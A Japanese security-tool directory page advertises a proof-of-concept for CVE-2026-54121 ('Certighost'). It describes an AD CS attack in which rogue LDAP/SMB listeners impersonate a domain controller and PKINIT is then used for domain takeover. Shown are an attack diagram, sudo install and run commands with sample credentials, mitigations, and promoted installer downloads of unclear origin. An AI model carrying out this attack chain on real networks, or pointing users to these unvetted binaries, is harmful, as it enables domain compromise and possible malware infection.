Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-54121-Certighost — CVE-2026-54121(Certighost)の概念実証モジュール。不正なLDAP/SMBリスナーを介してAD CSの登録検証を悪用し、ドメインコントローラーになりすましてPKINIT経由で権限昇格を行う。 | Kitploit
ツール/GitHubGitHub/zerodayevil/cve-2026-54121-certighost
特権昇格脆弱性分析エクスプロイトなりすましツールポストエクスプロイトペネトレーションテスト認証論文と研究レッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubzerodayevil/cve-2026-54121-certighost

CVE-2026-54121-Certighost

CVE-2026-54121(Certighost)の概念実証モジュール。不正なLDAP/SMBリスナーを介してAD CSの登録検証を悪用し、ドメインコントローラーになりすましてPKINIT経由で権限昇格を行う。

リポジトリを見る
13時間41分前未レビュー

🛡 AI Security Tool モジュール
CVE-2026-54121: Active Directory Certificate Services なりすまし (Certighost)

AI Security Tool エコシステム向け公式セキュリティ監査モジュール


Latest Release Build Status Donations Telegram Channel License

🌐 Web デモ • 📚 プロジェクトサイト • 💬 コミュニティチャット

ウェブサイトナビゲーション: ホーム • アップデート • ダウンロード • モジュール

AI Security Tool Banner


🧠 概念の概要

本モジュールは、Certighost と呼ばれる CVE-2026-54121 の診断機能を提供します。この脆弱性は、コンピューターアカウントの証明書登録の検証フェーズにおいて、Active Directory Certificate Services (AD CS) 内に存在します。

標準的な低権限のドメイン資格情報を持つ攻撃者は、新しいコンピューターアカウントを作成し、細工された cdc (制御された IP リスナー) および rmd (ターゲット DC の FQDN) 属性を含む証明書要求を送信します。Certificate Authority (CA) がマシンの ID を検証するために接続してくると、不正な LDAP (ポート 389) および SMB/LSA (ポート 445) リスナーがターゲットのドメインコントローラーの ID 属性 (sAMAccountName、SID、dNSHostName) を偽装します。これにより CA は正規のドメインコントローラー証明書を発行してしまい、PKINIT を介した完全なドメイン侵害が可能になります。

🎯 中核となる影響の考え方

「マシンとして認証し、ドメイン全体へ昇格する。」
Certighost は、CA の ID 解決パイプラインを汚染することで、従来の AD CS テンプレートのアクセス許可を回避します。有効なドメインコントローラー証明書を取得すると、即座に PKINIT 認証が可能になり、TGT 資格情報キャッシュ (.ccache) とターゲット DC の NT ハッシュの両方が得られます。

📊 脆弱性の仕様

🕸 攻撃シナリオとアーキテクチャ

root@kitploit:~
graph TD
    A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
    A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
    A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
    D -->|4. CA Lookups Connect to Rogue Listeners| C
    C -->|5. Validate via Netlogon & Return Target DC Identity| D
    D -->|6. Issue Valid DC Certificate .pfx| A
    A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]

🛡 緩和策チェックリスト

  • 🟢 セキュリティ更新プログラムの適用: CVE-2026-54121 に対処する Microsoft の公式パッチを AD CS サーバー全体に展開します。
  • 🟢 マシンアカウント作成の制限: ms-DS-MachineAccountQuota を 0 に設定し、非管理者ユーザーが新しいコンピューターオブジェクトを作成できないようにします。
  • 🟡 AD CS の堅牢化: 脆弱な証明書テンプレートを無効化し、明示的に必要な場合を除き EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) がオフになっていることを確認します。
  • 🟡 ネットワークフィルタリング: CA サーバーから任意のワークステーションへの送信 SMB (445) および LDAP (389) トラフィックをブロックします。

💻 このモジュールの実行方法

⚠️ 重要: 本モジュールは AI Security Tool フレームワーク内での安全な診断テスト用に設計されています。昇格された管理者権限を持つ、許可されたターゲットに対してのみ実行してください。

1️⃣ AI Security Tool のインストール

診断および監視スクリプトを実行するには、コアとなる AI Security Tool フレームワークをインストールします:

2️⃣ 依存関係のインストールと実行

不正な LDAP/SMB リスナーと証明書処理に必要な Python ライブラリをインストールします:

root@kitploit:~
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython

# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10

🔍 セキュリティ監査モジュール & PoC リポジトリ

コミュニティによって維持されている脆弱性スキャナーモジュール、PoC スクリプト、および研究リポジトリ:

🔥 リモートコード実行 (RCE) & ネットワーク脆弱性 4 モジュール
  • CVE-2026-41089 — Netlogon リモートコード実行エクスプロイト @ZeroDayEvil
  • CVE-2026-20805 — Windows リモートコード実行 Proof-of-Concept @ZeroDayEvil
  • CVE-2026-41096 — 重大な RCE 脆弱性スキャナーモジュール @ZeroDayEvil
  • CVE-2026-24291 — ネットワークプロトコルのリモートコード実行 @ZeroDayVPN
🛡 特権昇格 (EoP) & サービス 3 モジュール
  • CVE-2026-54121 — AD CS Certighost ドメインコントローラーなりすまし @ZeroDayEvil
  • CVE-2026-66804 — CrossDevice サービスの特権昇格 @ZeroDayVPN
  • CVE-2026-50416 — ローカル特権昇格の解説 & PoC @ZeroDayEvil
📚 脆弱性研究 & 解説記事 2 モジュール
  • CVE-2026-42978 — 詳細な技術分析 & PoC 研究 @ZeroDayEvil
  • CVE-2026-83991 — 完全な解説 & エクスプロイト実演 @ZeroDayVPN

⚖️ ライセンス & 法的免責事項

🚨 免責事項

本ツールおよびセキュリティ分析は、許可されたシステム監査、防御的研究、およびペネトレーションテストの業務に厳密に限定して提供されます。
システム所有者からの明示的な書面による許可なく、ドメイン環境に対して CVE-2026-54121 を実行することは違法です。著者は、許可されていないドメイン侵害、データ損失、またはシステム障害について一切の責任を負いません。

🔄 コントリビューション & コミュニティ

セキュリティ研究コミュニティからのコントリビューションを歓迎します! 主なコントリビューション分野:

  1. AI 統合: 新しい LLM プロバイダーの追加と専門的なセキュリティエージェントの開発。
  2. セキュリティツール: 脆弱性モジュールの開発と CLI スキャナーの統合。
  3. 最適化: パーサーの速度、実行の安全性、およびキャッシュロジックの強化。
  4. ドキュメント: 研究論文、ガイド、およびローカライズされた翻訳の作成。

🔗 お問い合わせ & サポート

  • 公式ウェブサイト: ZeroDayEvil.com
  • 技術分析: H0j3n による Gist 解説
  • MSRC アドバイザリ: CVE-2026-54121 ガイド
  • Telegram 管理者: @ZeroDayEvil
  • Telegram チャット: @ZeroDyaTool_chat
  • Telegram チャンネル: @ZeroDyaTool_channel
  • プロジェクトのスポンサー: PayPal 寄付
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — サイバーセキュリティ専門家のためのターミナルワークフローと自動化を再構想する。

ツールをダウンロード
仕様割り当てられた値備考
CVE 識別子CVE-2026-54121Active Directory Certificate Services なりすまし
深刻度評価Critical (CVSS v3.1: 9.8)CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
脆弱性の種類CWE-287 / CWE-290不適切な認証 / なりすましによる認証バイパス
影響を受けるコンポーネントActive Directory Certificate Services (AD CS)証明書登録および ID 検証パイプライン
攻撃ベクトルネットワークSMB、LDAP、RPC プロトコルを介してリモートで実行
必要な権限低権限標準のドメインユーザーアカウント (マシンアカウントを追加する権限)
OS / プラットフォームバージョンアーキテクチャ / 形式リリース日ステータスダウンロードリンク
🪟 Windowsv6.3.20x64 インストーラー (.exe)2026-09-08🟢 最新.exe をダウンロード
🪟 Windowsv6.3.20x64 ポータブル (.tar.gz)2026-09-08🟢 最新.tar.gz をダウンロード
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 安定版.dmg をダウンロード
🐧 Linuxv5.3.27ユニバーサル x64 (.tar.gz)2026-09-01🟢 安定版.tar.gz をダウンロード
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 安定版.apk をダウンロード